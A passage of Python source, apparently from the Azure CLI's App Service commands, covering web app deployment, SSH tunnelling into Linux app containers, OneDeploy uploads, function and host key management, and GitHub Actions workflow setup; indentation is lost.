_create_new_app = _site_availability.name_available
os_name = os_type if os_type else detect_os_form_src(src_dir, html)
_is_linux = os_name.lower() == 'linux'
if runtime and html:
raise CLIError('Conflicting parameters: cannot have both --runtime and --html specified.')
if runtime:
helper = _StackRuntimeHelper(cmd, client, linux=_is_linux)
runtime = helper.remove_delimiters(runtime)
match = helper.resolve(runtime)
if not match:
if _is_linux:
raise CLIError("Linux runtime '{}' is not supported."
" Please invoke 'az webapp list-runtimes --linux' to cross check".format(runtime))
raise CLIError("Windows runtime '{}' is not supported."
" Please invoke 'az webapp list-runtimes' to cross check".format(runtime))
language = runtime.split('|')[0]
version_used_create = '|'.join(runtime.split('|')[1:])
detected_version = '-'
else:
# detect the version
_lang_details = get_lang_from_content(src_dir, html)
language = _lang_details.get('language')
_data = get_runtime_version_details(_lang_details.get('file_loc'), language)
version_used_create = _data.get('to_create')
detected_version = _data.get('detected')
runtime_version = "{}|{}".format(language, version_used_create) if \
version_used_create != "-" else version_used_create
site_config = None
if not _create_new_app: # App exists, or App name unavailable
if _site_availability.reason == 'Invalid':
raise CLIError(_site_availability.message)
# Get the ASP & RG info, if the ASP & RG parameters are provided we use those else we need to find those
logger.warning("Webapp '%s' already exists. The command will deploy contents to the existing app.", name)
app_details = get_app_details(cmd, name)
if app_details is None:
raise CLIError("Unable to retrieve details of the existing app '{}'. Please check that the app "
"is a part of the current subscription if updating an existing app. If creating "
"a new app, app names must be globally unique. Please try a more unique name or "
"leave unspecified to receive a randomly generated name.".format(name))
current_rg = app_details.resource_group
if resource_group_name is not None and (resource_group_name.lower() != current_rg.lower()):
raise CLIError("The webapp '{}' exists in ResourceGroup '{}' and does not "
"match the value entered '{}'. Please re-run command with the "
"correct parameters.". format(name, current_rg, resource_group_name))
rg_name = resource_group_name or current_rg
if location is None:
loc = app_details.location.replace(" ", "").lower()
else:
loc = location.replace(" ", "").lower()
plan_details = parse_resource_id(app_details.server_farm_id)
current_plan = plan_details['name']
if plan is not None and current_plan.lower() != plan.lower():
raise CLIError("The plan name entered '{}' does not match the plan name that the webapp is hosted in '{}'."
"Please check if you have configured defaults for plan name and re-run command."
.format(plan, current_plan))
plan = plan or plan_details['name']
plan_info = client.app_service_plans.get(plan_details['resource_group'], plan)
sku = plan_info.sku.name if isinstance(plan_info, AppServicePlan) else 'Free'
current_os = 'Linux' if plan_info.reserved else 'Windows'
# Raise error if current OS of the app is different from the current one
if current_os.lower() != os_name.lower():
raise CLIError("The webapp '{}' is a {} app. The code detected at '{}' will default to "
"'{}'. Please create a new app "
"to continue this operation. For more information on default behaviors, "
"see https://docs.microsoft.com/cli/azure/webapp?view=azure-cli-latest#az_webapp_up."
.format(name, current_os, src_dir, os_name))
_is_linux = plan_info.reserved
# for an existing app check if the runtime version needs to be updated
# Get site config to check the runtime version
site_config = client.web_apps.get_configuration(rg_name, name)
else: # need to create new app, check if we need to use default RG or use user entered values
logger.warning("The webapp '%s' doesn't exist", name)
sku = get_sku_to_use(src_dir, html, sku, runtime)
loc = set_location(cmd, sku, location)
rg_name = get_rg_to_use(user, resource_group_name)
_create_new_rg = not check_resource_group_exists(cmd, rg_name)
plan = get_plan_to_use(cmd=cmd,
user=user,
loc=loc,
sku=sku,
create_rg=_create_new_rg,
resource_group_name=rg_name,
plan=plan)
dry_run_str = r""" {
"name" : "%s",
"appserviceplan" : "%s",
"resourcegroup" : "%s",
"sku": "%s",
"os": "%s",
"location" : "%s",
"src_path" : "%s",
"runtime_version_detected": "%s",
"runtime_version": "%s"
}
""" % (name, plan, rg_name, get_sku_tier(sku), os_name, loc, _src_path_escaped, detected_version,
runtime_version)
create_json = json.loads(dry_run_str)
if dryrun:
logger.warning("Web app will be created with the below configuration,re-run command "
"without the --dryrun flag to create & deploy a new app")
return create_json
if _create_new_rg:
logger.warning("Creating Resource group '%s' ...", rg_name)
create_resource_group(cmd, rg_name, loc)
logger.warning("Resource group creation complete")
# create ASP
logger.warning("Creating AppServicePlan '%s' ...", plan)
# we will always call the ASP create or update API so that in case of re-deployment, if the SKU or plan setting are
# updated we update those
try:
create_app_service_plan(cmd, rg_name, plan, _is_linux, hyper_v=False, per_site_scaling=False, sku=sku,
number_of_workers=1 if _is_linux else None, location=loc,
app_service_environment=app_service_environment)
except Exception as ex: # pylint: disable=broad-except
if ex.response.status_code == 409: # catch 409 conflict when trying to create existing ASP in diff location
try:
response_content = json.loads(ex.response._content.decode('utf-8')) # pylint: disable=protected-access
except Exception: # pylint: disable=broad-except
raise CLIInternalError(ex)
raise UnclassifiedUserFault(response_content['error']['message'])
raise AzureResponseError(ex)
if _create_new_app:
logger.warning("Creating webapp '%s' ...", name)
create_webapp(cmd, rg_name, name, plan, runtime_version if not html else None,
using_webapp_up=True, language=language)
_configure_default_logging(cmd, rg_name, name)
else: # for existing app if we might need to update the stack runtime settings
helper = _StackRuntimeHelper(cmd, client, linux=_is_linux)
match = helper.resolve(runtime_version)
if os_name.lower() == 'linux' and site_config.linux_fx_version != runtime_version:
if match and site_config.linux_fx_version != match['configs']['linux_fx_version']:
logger.warning('Updating runtime version from %s to %s',
site_config.linux_fx_version, match['configs']['linux_fx_version'])
update_site_configs(cmd, rg_name, name, linux_fx_version=match['configs']['linux_fx_version'])
logger.warning('Waiting for runtime version to propagate ...')
time.sleep(30) # wait for kudu to get updated runtime before zipdeploy. No way to poll for this
elif not match:
logger.warning('Updating runtime version from %s to %s',
site_config.linux_fx_version, runtime_version)
update_site_configs(cmd, rg_name, name, linux_fx_version=runtime_version)
logger.warning('Waiting for runtime version to propagate ...')
time.sleep(30) # wait for kudu to get updated runtime before zipdeploy. No way to poll for this
elif os_name.lower() == 'windows':
# may need to update stack runtime settings. For node its site_config.app_settings, otherwise site_config
if match:
_update_app_settings_for_windows_if_needed(cmd, rg_name, name, match, site_config, runtime_version)
create_json['runtime_version'] = runtime_version
# Zip contents & Deploy
logger.warning("Creating zip with contents of dir %s ...", src_dir)
# zip contents & deploy
zip_file_path = zip_contents_from_dir(src_dir, language)
enable_zip_deploy(cmd, rg_name, name, zip_file_path)
if launch_browser:
logger.warning("Launching app using default browser")
view_in_browser(cmd, rg_name, name, None, logs)
else:
_url = _get_url(cmd, rg_name, name)
logger.warning("You can launch the app at %s", _url)
create_json.update({'URL': _url})
if logs:
_configure_default_logging(cmd, rg_name, name)
return get_streaming_log(cmd, rg_name, name)
with ConfiguredDefaultSetter(cmd.cli_ctx.config, True):
cmd.cli_ctx.config.set_value('defaults', 'group', rg_name)
cmd.cli_ctx.config.set_value('defaults', 'sku', sku)
cmd.cli_ctx.config.set_value('defaults', 'appserviceplan', plan)
cmd.cli_ctx.config.set_value('defaults', 'location', loc)
cmd.cli_ctx.config.set_value('defaults', 'web', name)
return create_json
def _update_app_settings_for_windows_if_needed(cmd, rg_name, name, match, site_config, runtime_version):
update_needed = False
if 'node' in runtime_version:
settings = []
for k, v in match['configs'].items():
for app_setting in site_config.app_settings:
if app_setting.name == k and app_setting.value != v:
update_needed = True
settings.append('%s=%s', k, v)
if update_needed:
logger.warning('Updating runtime version to %s', runtime_version)
update_app_settings(cmd, rg_name, name, settings=settings, slot=None, slot_settings=None)
else:
for k, v in match['configs'].items():
if getattr(site_config, k, None) != v:
update_needed = True
setattr(site_config, k, v)
if update_needed:
logger.warning('Updating runtime version to %s', runtime_version)
update_site_configs(cmd,
rg_name,
name,
net_framework_version=site_config.net_framework_version,
php_version=site_config.php_version,
python_version=site_config.python_version,
java_version=site_config.java_version,
java_container=site_config.java_container,
java_container_version=site_config.java_container_version)
current_stack = get_current_stack_from_runtime(runtime_version)
_update_webapp_current_stack_property_if_needed(cmd, rg_name, name, current_stack)
if update_needed:
logger.warning('Waiting for runtime version to propagate ...')
time.sleep(30) # wait for kudu to get updated runtime before zipdeploy. No way to poll for this
def _update_webapp_current_stack_property_if_needed(cmd, resource_group, name, current_stack):
if not current_stack:
return
# portal uses this current_stack value to display correct runtime for windows webapps
client = web_client_factory(cmd.cli_ctx)
app_metadata = client.web_apps.list_metadata(resource_group, name)
if 'CURRENT_STACK' not in app_metadata.properties or app_metadata.properties["CURRENT_STACK"] != current_stack:
app_metadata.properties["CURRENT_STACK"] = current_stack
client.web_apps.update_metadata(resource_group, name, metadata=app_metadata)
def _ping_scm_site(cmd, resource_group, name, instance=None):
from azure.cli.core.util import should_disable_connection_verify
# wake up kudu, by making an SCM call
import requests
# work around until the timeout limits issue for linux is investigated & fixed
user_name, password = _get_site_credential(cmd.cli_ctx, resource_group, name)
scm_url = _get_scm_url(cmd, resource_group, name)
import urllib3
authorization = urllib3.util.make_headers(basic_auth='{}:{}'.format(user_name, password))
cookies = {}
if instance is not None:
cookies['ARRAffinity'] = instance
requests.get(scm_url + '/api/settings', headers=authorization, verify=not should_disable_connection_verify(),
cookies=cookies)
def is_webapp_up(tunnel_server):
return tunnel_server.is_webapp_up()
def get_tunnel(cmd, resource_group_name, name, port=None, slot=None, instance=None):
webapp = show_webapp(cmd, resource_group_name, name, slot)
is_linux = webapp.reserved
if not is_linux:
raise CLIError("Only Linux App Service Plans supported, Found a Windows App Service Plan")
profiles = list_publish_profiles(cmd, resource_group_name, name, slot)
profile_user_name = next(p['userName'] for p in profiles)
profile_user_password = next(p['userPWD'] for p in profiles)
if port is None:
port = 0 # Will auto-select a free port from 1024-65535
logger.info('No port defined, creating on random free port')
# Validate that we have a known instance (case-sensitive)
if instance is not None:
instances = list_instances(cmd, resource_group_name, name, slot=slot)
instance_names = set(i.name for i in instances)
if instance not in instance_names:
if slot is not None:
raise CLIError("The provided instance '{}' is not valid for this webapp and slot.".format(instance))
raise CLIError("The provided instance '{}' is not valid for this webapp.".format(instance))
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
tunnel_server = TunnelServer('', port, scm_url, profile_user_name, profile_user_password, instance)
_ping_scm_site(cmd, resource_group_name, name, instance=instance)
_wait_for_webapp(tunnel_server)
return tunnel_server
def create_tunnel(cmd, resource_group_name, name, port=None, slot=None, timeout=None, instance=None):
tunnel_server = get_tunnel(cmd, resource_group_name, name, port, slot, instance)
t = threading.Thread(target=_start_tunnel, args=(tunnel_server,))
t.daemon = True
t.start()
logger.warning('Opening tunnel on port: %s', tunnel_server.local_port)
config = get_site_configs(cmd, resource_group_name, name, slot)
if config.remote_debugging_enabled:
logger.warning('Tunnel is ready, connect on port %s', tunnel_server.local_port)
else:
ssh_user_name = 'root'
ssh_user_password = 'Docker!'
logger.warning('SSH is available { username: %s, password: %s }', ssh_user_name, ssh_user_password)
logger.warning('Ctrl + C to close')
if timeout:
time.sleep(int(timeout))
else:
while t.is_alive():
time.sleep(5)
def create_tunnel_and_session(cmd, resource_group_name, name, port=None, slot=None, timeout=None, instance=None):
tunnel_server = get_tunnel(cmd, resource_group_name, name, port, slot, instance)
t = threading.Thread(target=_start_tunnel, args=(tunnel_server,))
t.daemon = True
t.start()
ssh_user_name = 'root'
ssh_user_password = 'Docker!'
s = threading.Thread(target=_start_ssh_session,
args=('localhost', tunnel_server.get_port(), ssh_user_name, ssh_user_password))
s.daemon = True
s.start()
if timeout:
time.sleep(int(timeout))
else:
while s.is_alive() and t.is_alive():
time.sleep(5)
def perform_onedeploy(cmd,
resource_group_name,
name,
src_path=None,
src_url=None,
target_path=None,
artifact_type=None,
is_async=None,
restart=None,
clean=None,
ignore_stack=None,
timeout=None,
slot=None):
params = OneDeployParams()
params.cmd = cmd
params.resource_group_name = resource_group_name
params.webapp_name = name
params.src_path = src_path
params.src_url = src_url
params.target_path = target_path
params.artifact_type = artifact_type
params.is_async_deployment = is_async
params.should_restart = restart
params.is_clean_deployment = clean
params.should_ignore_stack = ignore_stack
params.timeout = timeout
params.slot = slot
return _perform_onedeploy_internal(params)
# Class for OneDeploy parameters
# pylint: disable=too-many-instance-attributes,too-few-public-methods
class OneDeployParams:
def __init__(self):
self.cmd = None
self.resource_group_name = None
self.webapp_name = None
self.src_path = None
self.src_url = None
self.artifact_type = None
self.is_async_deployment = None
self.target_path = None
self.should_restart = None
self.is_clean_deployment = None
self.should_ignore_stack = None
self.timeout = None
self.slot = None
# pylint: enable=too-many-instance-attributes,too-few-public-methods
def _build_onedeploy_url(params):
scm_url = _get_scm_url(params.cmd, params.resource_group_name, params.webapp_name, params.slot)
deploy_url = scm_url + '/api/publish?type=' + params.artifact_type
if params.is_async_deployment is not None:
deploy_url = deploy_url + '&async=' + str(params.is_async_deployment)
if params.should_restart is not None:
deploy_url = deploy_url + '&restart=' + str(params.should_restart)
if params.is_clean_deployment is not None:
deploy_url = deploy_url + '&clean=' + str(params.is_clean_deployment)
if params.should_ignore_stack is not None:
deploy_url = deploy_url + '&ignorestack=' + str(params.should_ignore_stack)
if params.target_path is not None:
deploy_url = deploy_url + '&path=' + params.target_path
return deploy_url
def _get_onedeploy_status_url(params):
scm_url = _get_scm_url(params.cmd, params.resource_group_name, params.webapp_name, params.slot)
return scm_url + '/api/deployments/latest'
def _get_basic_headers(params):
import urllib3
user_name, password = _get_site_credential(params.cmd.cli_ctx, params.resource_group_name,
params.webapp_name, params.slot)
if params.src_path:
content_type = 'application/octet-stream'
elif params.src_url:
content_type = 'application/json'
else:
raise CLIError('Unable to determine source location of the artifact being deployed')
headers = urllib3.util.make_headers(basic_auth='{0}:{1}'.format(user_name, password))
headers['Cache-Control'] = 'no-cache'
headers['User-Agent'] = get_az_user_agent()
headers['Content-Type'] = content_type
return headers
def _get_onedeploy_request_body(params):
import os
if params.src_path:
logger.info('Deploying from local path: %s', params.src_path)
try:
with open(os.path.realpath(os.path.expanduser(params.src_path)), 'rb') as fs:
body = fs.read()
except Exception as e: # pylint: disable=broad-except
raise CLIError("Either '{}' is not a valid local file path or you do not have permissions to access it"
.format(params.src_path)) from e
elif params.src_url:
logger.info('Deploying from URL: %s', params.src_url)
body = json.dumps({
"packageUri": params.src_url
})
else:
raise CLIError('Unable to determine source location of the artifact being deployed')
return body
def _update_artifact_type(params):
import ntpath
if params.artifact_type is not None:
return
# Interpret deployment type from the file extension if the type parameter is not passed
file_name = ntpath.basename(params.src_path)
file_extension = file_name.split(".", 1)[1]
if file_extension in ('war', 'jar', 'ear', 'zip'):
params.artifact_type = file_extension
elif file_extension in ('sh', 'bat'):
params.artifact_type = 'startup'
else:
params.artifact_type = 'static'
logger.warning("Deployment type: %s. To override deloyment type, please specify the --type parameter. "
"Possible values: war, jar, ear, zip, startup, script, static", params.artifact_type)
def _make_onedeploy_request(params):
import requests
from azure.cli.core.util import (
should_disable_connection_verify,
)
# Build the request body, headers, API URL and status URL
body = _get_onedeploy_request_body(params)
headers = _get_basic_headers(params)
deploy_url = _build_onedeploy_url(params)
deployment_status_url = _get_onedeploy_status_url(params)
logger.info("Deployment API: %s", deploy_url)
response = requests.post(deploy_url, data=body, headers=headers, verify=not should_disable_connection_verify())
# For debugging purposes only, you can change the async deployment into a sync deployment by polling the API status
# For that, set poll_async_deployment_for_debugging=True
poll_async_deployment_for_debugging = True
# check the status of async deployment
if response.status_code == 202 or response.status_code == 200:
response_body = None
if poll_async_deployment_for_debugging:
logger.info('Polling the status of async deployment')
response_body = _check_zip_deployment_status(params.cmd, params.resource_group_name, params.webapp_name,
deployment_status_url, headers, params.timeout)
logger.info('Async deployment complete. Server response: %s', response_body)
return response_body
# API not available yet!
if response.status_code == 404:
raise CLIError("This API isn't available in this environment yet!")
# check if there's an ongoing process
if response.status_code == 409:
raise CLIError("Another deployment is in progress. Please wait until that process is complete before "
"starting a new deployment. You can track the ongoing deployment at {}"
.format(deployment_status_url))
# check if an error occured during deployment
if response.status_code:
raise CLIError("An error occured during deployment. Status Code: {}, Details: {}"
.format(response.status_code, response.text))
# OneDeploy
def _perform_onedeploy_internal(params):
# Update artifact type, if required
_update_artifact_type(params)
# Now make the OneDeploy API call
logger.info("Initiating deployment")
response = _make_onedeploy_request(params)
logger.info("Deployment has completed successfully")
return response
def _wait_for_webapp(tunnel_server):
tries = 0
while True:
if is_webapp_up(tunnel_server):
break
if tries == 0:
logger.warning('Connection is not ready yet, please wait')
if tries == 60:
raise CLIError('SSH timeout, your app must be running before'
' it can accept SSH connections. '
'Use `az webapp log tail` to review the app startup logs.')
tries = tries + 1
logger.warning('.')
time.sleep(1)
def _start_tunnel(tunnel_server):
tunnel_server.start_server()
def _start_ssh_session(hostname, port, username, password):
tries = 0
while True:
try:
c = Connection(host=hostname,
port=port,
user=username,
# connect_timeout=60*10,
connect_kwargs={"password": password})
break
except Exception as ex: # pylint: disable=broad-except
logger.info(ex)
if tries == 0:
logger.warning('Connection is not ready yet, please wait')
if tries == 60:
raise CLIError("Timeout Error, Unable to establish a connection")
tries = tries + 1
logger.warning('.')
time.sleep(1)
try:
try:
c.run('cat /etc/motd', pty=True)
except invoke.exceptions.UnexpectedExit:
# Don't crash over a non-existing /etc/motd.
pass
c.run('source /etc/profile; exec $SHELL -l', pty=True)
except Exception as ex: # pylint: disable=broad-except
logger.info(ex)
finally:
c.close()
def ssh_webapp(cmd, resource_group_name, name, port=None, slot=None, timeout=None, instance=None): # pylint: disable=too-many-statements
import platform
if platform.system() == "Windows":
webapp = show_webapp(cmd, resource_group_name, name, slot)
is_linux = webapp.reserved
if not is_linux:
raise ValidationError("Only Linux App Service Plans supported, found a Windows App Service Plan")
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
if not instance:
open_page_in_browser(scm_url + '/webssh/host')
else:
open_page_in_browser(scm_url + '/webssh/host?instance={}'.format(instance))
else:
config = get_site_configs(cmd, resource_group_name, name, slot)
if config.remote_debugging_enabled:
raise ValidationError('Remote debugging is enabled, please disable')
create_tunnel_and_session(
cmd, resource_group_name, name, port=port, slot=slot, timeout=timeout, instance=instance)
def _configure_default_logging(cmd, rg_name, name):
logger.warning("Configuring default logging for the app, if not already enabled")
return config_diagnostics(cmd, rg_name, name,
application_logging=True, web_server_logging='filesystem',
docker_container_logging='true')
def _validate_app_service_environment_id(cli_ctx, ase, resource_group_name):
ase_is_id = is_valid_resource_id(ase)
if ase_is_id:
return ase
from azure.cli.core.commands.client_factory import get_subscription_id
return resource_id(
subscription=get_subscription_id(cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.Web',
type='hostingEnvironments',
name=ase)
def _format_key_vault_id(cli_ctx, key_vault, resource_group_name):
key_vault_is_id = is_valid_resource_id(key_vault)
if key_vault_is_id:
return key_vault
from azure.cli.core.commands.client_factory import get_subscription_id
return resource_id(
subscription=get_subscription_id(cli_ctx),
resource_group=resource_group_name,
namespace='Microsoft.KeyVault',
type='vaults',
name=key_vault)
def _verify_hostname_binding(cmd, resource_group_name, name, hostname, slot=None):
hostname_bindings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_host_name_bindings', slot)
verified_hostname_found = False
for hostname_binding in hostname_bindings:
binding_name = hostname_binding.name.split('/')[-1]
if binding_name.lower() == hostname and (hostname_binding.host_name_type == 'Verified' or
hostname_binding.host_name_type == 'Managed'):
verified_hostname_found = True
return verified_hostname_found
def update_host_key(cmd, resource_group_name, name, key_type, key_name, key_value=None, slot=None):
# pylint: disable=protected-access
key_info = KeyInfo(name=key_name, value=key_value)
KeyInfo._attribute_map = {
'name': {'key': 'properties.name', 'type': 'str'},
'value': {'key': 'properties.value', 'type': 'str'},
}
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.create_or_update_host_secret_slot(resource_group_name,
name,
key_type,
key_name,
slot, key=key_info)
return client.web_apps.create_or_update_host_secret(resource_group_name,
name,
key_type,
key_name, key=key_info)
def list_host_keys(cmd, resource_group_name, name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.list_host_keys_slot(resource_group_name, name, slot)
return client.web_apps.list_host_keys(resource_group_name, name)
def delete_host_key(cmd, resource_group_name, name, key_type, key_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.delete_host_secret_slot(resource_group_name, name, key_type, key_name, slot)
return client.web_apps.delete_host_secret(resource_group_name, name, key_type, key_name)
def show_function(cmd, resource_group_name, name, function_name):
client = web_client_factory(cmd.cli_ctx)
result = client.web_apps.get_function(resource_group_name, name, function_name)
if result is None:
return "Function '{}' does not exist in app '{}'".format(function_name, name)
return result
def delete_function(cmd, resource_group_name, name, function_name):
client = web_client_factory(cmd.cli_ctx)
result = client.web_apps.delete_function(resource_group_name, name, function_name)
return result
def update_function_key(cmd, resource_group_name, name, function_name, key_name, key_value=None, slot=None):
# pylint: disable=protected-access
key_info = KeyInfo(name=key_name, value=key_value)
KeyInfo._attribute_map = {
'name': {'key': 'properties.name', 'type': 'str'},
'value': {'key': 'properties.value', 'type': 'str'},
}
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.create_or_update_function_secret_slot(resource_group_name,
name,
function_name,
key_name,
slot,
key_info)
return client.web_apps.create_or_update_function_secret(resource_group_name,
name,
function_name,
key_name,
key_info)
def list_function_keys(cmd, resource_group_name, name, function_name, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.list_function_keys_slot(resource_group_name, name, function_name, slot)
return client.web_apps.list_function_keys(resource_group_name, name, function_name)
def delete_function_key(cmd, resource_group_name, name, key_name, function_name=None, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
return client.web_apps.delete_function_secret_slot(resource_group_name, name, function_name, key_name, slot)
return client.web_apps.delete_function_secret(resource_group_name, name, function_name, key_name)
def add_github_actions(cmd, resource_group, name, repo, runtime=None, token=None, slot=None, # pylint: disable=too-many-statements,too-many-branches
branch='master', login_with_github=False, force=False):
if not token and not login_with_github:
raise_missing_token_suggestion()
elif not token:
scopes = ["admin:repo_hook", "repo", "workflow"]
token = get_github_access_token(cmd, scopes)
elif token and login_with_github:
logger.warning("Both token and --login-with-github flag are provided. Will use provided token")
# Verify resource group, app
site_availability = get_site_availability(cmd, name)
if site_availability.name_available or (not site_availability.name_available and
site_availability.reason == 'Invalid'):
raise ResourceNotFoundError(
"The Resource 'Microsoft.Web/sites/%s' under resource group '%s' "
"was not found." % (name, resource_group))
app_details = get_app_details(cmd, name)
if app_details is None:
raise ResourceNotFoundError(
"Unable to retrieve details of the existing app %s. Please check that the app is a part of "
"the current subscription" % name)
current_rg = app_details.resource_group
if resource_group is not None and (resource_group.lower() != current_rg.lower()):
raise ResourceNotFoundError("The webapp %s exists in ResourceGroup %s and does not match the "
"value entered %s. Please re-run command with the correct "
"parameters." % (name, current_rg, resource_group))
parsed_plan_id = parse_resource_id(app_details.server_farm_id)
client = web_client_factory(cmd.cli_ctx)
plan_info = client.app_service_plans.get(parsed_plan_id['resource_group'], parsed_plan_id['name'])
is_linux = plan_info.reserved
# Verify github repo
from github import Github, GithubException
from github.GithubException import BadCredentialsException, UnknownObjectException
if repo.strip()[-1] == '/':
repo = repo.strip()[:-1]
g = Github(token)
github_repo = None
try:
github_repo = g.get_repo(repo)
try:
github_repo.get_branch(branch=branch)
except GithubException as e:
error_msg = "Encountered GitHub error when accessing {} branch in {} repo.".format(branch, repo)
if e.data and e.data['message']:
error_msg += " Error: {}".format(e.data['message'])
raise CLIError(error_msg)
logger.warning('Verified GitHub repo and branch')
except BadCredentialsException:
raise CLIError("Could not authenticate to the repository. Please create a Personal Access Token and use "
"the --token argument. Run 'az webapp deployment github-actions add --help' "
"for more information.")
except GithubException as e:
error_msg = "Encountered GitHub error when accessing {} repo".format(repo)
if e.data and e.data['message']:
error_msg += " Error: {}".format(e.data['message'])
raise CLIError(error_msg)
# Verify runtime
app_runtime_info = _get_app_runtime_info(
cmd=cmd, resource_group=resource_group, name=name, slot=slot, is_linux=is_linux)
app_runtime_string = None
if(app_runtime_info and app_runtime_info['display_name']):
app_runtime_string = app_runtime_info['display_name']
github_actions_version = None
if (app_runtime_info and app_runtime_info['github_actions_version']):
github_actions_version = app_runtime_info['github_actions_version']
if runtime and app_runtime_string:
if app_runtime_string.lower() != runtime.lower():
logger.warning('The app runtime: {app_runtime_string} does not match the runtime specified: '
'{runtime}. Using the specified runtime {runtime}.')
app_runtime_string = runtime
elif runtime:
app_runtime_string = runtime
if not app_runtime_string:
raise CLIError('Could not detect runtime. Please specify using the --runtime flag.')
if not _runtime_supports_github_actions(runtime_string=app_runtime_string, is_linux=is_linux):
raise CLIError("Runtime %s is not supported for GitHub Actions deployments." % app_runtime_string)
# Get workflow template
logger.warning('Getting workflow template using runtime: %s', app_runtime_string)
workflow_template = _get_workflow_template(github=g, runtime_string=app_runtime_string, is_linux=is_linux)
# Fill workflow template
guid = str(uuid.uuid4()).replace('-', '')
publish_profile_name = "AzureAppService_PublishProfile_{}".format(guid)
logger.warning(
'Filling workflow template with name: %s, branch: %s, version: %s, slot: %s',
name, branch, github_actions_version, slot if slot else 'production')
completed_workflow_file = _fill_workflow_template(content=workflow_template.decoded_content.decode(), name=name,
branch=branch, slot=slot, publish_profile=publish_profile_name,
version=github_actions_version)
completed_workflow_file = completed_workflow_file.encode()
# Check if workflow exists in repo, otherwise push
if slot:
file_name = "{}_{}({}).yml".format(branch.replace('/', '-'), name.lower(), slot)
else:
file_name = "{}_{}.yml".format(branch.replace('/', '-'), name.lower())
dir_path = "{}/{}".format('.github', 'workflows')
file_path = "/{}/{}".format(dir_path, file_name)
try:
existing_workflow_file = github_repo.get_contents(path=file_path, ref=branch)
existing_publish_profile_name = _get_publish_profile_from_workflow_file(
workflow_file=str(existing_workflow_file.decoded_content))
if existing_publish_profile_name:
completed_workflow_file = completed_workflow_file.decode()
completed_workflow_file = completed_workflow_file.replace(
publish_profile_name, existing_publish_profile_name)
completed_workflow_file = completed_workflow_file.encode()
publish_profile_name = existing_publish_profile_name
logger.warning("Existing workflow file found")
if force:
logger.warning("Replacing the existing workflow file")
github_repo.update_file(path=file_path, message="Update workflow using Azure CLI",
content=completed_workflow_file, sha=existing_workflow_file.sha, branch=branch)
else:
option = prompt_y_n('Replace existing workflow file?')
if option:
logger.warning("Replacing the existing workflow file")
github_repo.update_file(path=file_path, message="Update workflow using Azure CLI",
content=completed_workflow_file, sha=existing_workflow_file.sha,
branch=branch)
else:
logger.warning("Use the existing workflow file")
if existing_publish_profile_name:
publish_profile_name = existing_publish_profile_name
except UnknownObjectException:
logger.warning("Creating new workflow file: %s", file_path)
github_repo.create_file(path=file_path, message="Create workflow using Azure CLI",
content=completed_workflow_file, branch=branch)
# Add publish profile to GitHub
logger.warning('Adding publish profile to GitHub')
_add_publish_profile_to_github(cmd=cmd, resource_group=resource_group, name=name, repo=repo,
token=token, github_actions_secret_name=publish_profile_name,
slot=slot)
# Set site source control properties
_update_site_source_control_properties_for_gh_action(
cmd=cmd, resource_group=resource_group, name=name, token=token, repo=repo, branch=branch, slot=slot)
github_actions_url = "https://github.com/{}/actions".format(repo)
return github_actions_url
def remove_github_actions(cmd, resource_group, name, repo, token=None, slot=None, # pylint: disable=too-many-statements
branch='master', login_with_github=False):
if not token and not login_with_github:
raise_missing_token_suggestion()
elif not token:
scopes = ["admin:repo_hook", "repo", "workflow"]
token = get_github_access_token(cmd, scopes)
elif token and login_with_github:
logger.warning("Both token and --login-with-github flag are provided. Will use provided token")
# Verify resource group, app
site_availability = get_site_availability(cmd, name)
if site_availability.name_available or (not site_availability.name_available and
site_availability.reason == 'Invalid'):
raise CLIError("The Resource 'Microsoft.Web/sites/%s' under resource group '%s' was not found." %
(name, resource_group))
app_details = get_app_details(cmd, name)
if app_details is None:
raise CLIError("Unable to retrieve details of the existing app %s. "
"Please check that the app is a part of the current subscription" % name)
current_rg = app_details.resource_group
if resource_group is not None and (resource_group.lower() != current_rg.lower()):
raise CLIError("The webapp %s exists in ResourceGroup %s and does not match "
"the value entered %s. Please re-run command with the correct "
"parameters." % (name, current_rg, resource_group))
# Verify github repo
from github import Github, GithubException
from github.GithubException import BadCredentialsException, UnknownObjectException
if repo.strip()[-1] == '/':
repo = repo.strip()[:-1]
g = Github(token)
github_repo = None
try:
github_repo = g.get_repo(repo)
try:
github_repo.get_branch(branch=branch)
except GithubException as e:
error_msg = "Encountered GitHub error when accessing {} branch in {} repo.".format(branch, repo)
if e.data and e.data['message']:
error_msg += " Error: {}".format(e.data['message'])
raise CLIError(error_msg)
logger.warning('Verified GitHub repo and branch')
except BadCredentialsException:
raise CLIError("Could not authenticate to the repository. Please create a Personal Access Token and use "
"the --token argument. Run 'az webapp deployment github-actions add --help' "
"for more information.")
except GithubException as e:
error_msg = "Encountered GitHub error when accessing {} repo".format(repo)
if e.data and e.data['message']:
error_msg += " Error: {}".format(e.data['message'])
raise CLIError(error_msg)
# Check if workflow exists in repo and remove
file_name = "{}_{}({}).yml".format(
branch.replace('/', '-'), name.lower(), slot) if slot else "{}_{}.yml".format(
branch.replace('/', '-'), name.lower())
dir_path = "{}/{}".format('.github', 'workflows')
file_path = "/{}/{}".format(dir_path, file_name)
existing_publish_profile_name = None
try:
existing_workflow_file = github_repo.get_contents(path=file_path, ref=branch)
existing_publish_profile_name = _get_publish_profile_from_workflow_file(
workflow_file=str(existing_workflow_file.decoded_content))
logger.warning("Removing the existing workflow file")
github_repo.delete_file(path=file_path, message="Removing workflow file, disconnecting github actions",
sha=existing_workflow_file.sha, branch=branch)
except UnknownObjectException as e:
error_msg = "Error when removing workflow file."
if e.data and e.data['message']:
error_msg += " Error: {}".format(e.data['message'])
raise CLIError(error_msg)
# Remove publish profile from GitHub
if existing_publish_profile_name:
logger.warning('Removing publish profile from GitHub')
_remove_publish_profile_from_github(cmd=cmd, resource_group=resource_group, name=name, repo=repo, token=token,
github_actions_secret_name=existing_publish_profile_name, slot=slot)
# Remove site source control properties
delete_source_control(cmd=cmd,
resource_group_name=resource_group,
name=name,
slot=slot)
return "Disconnected successfully."
def _get_publish_profile_from_workflow_file(workflow_file):
import re
publish_profile = None
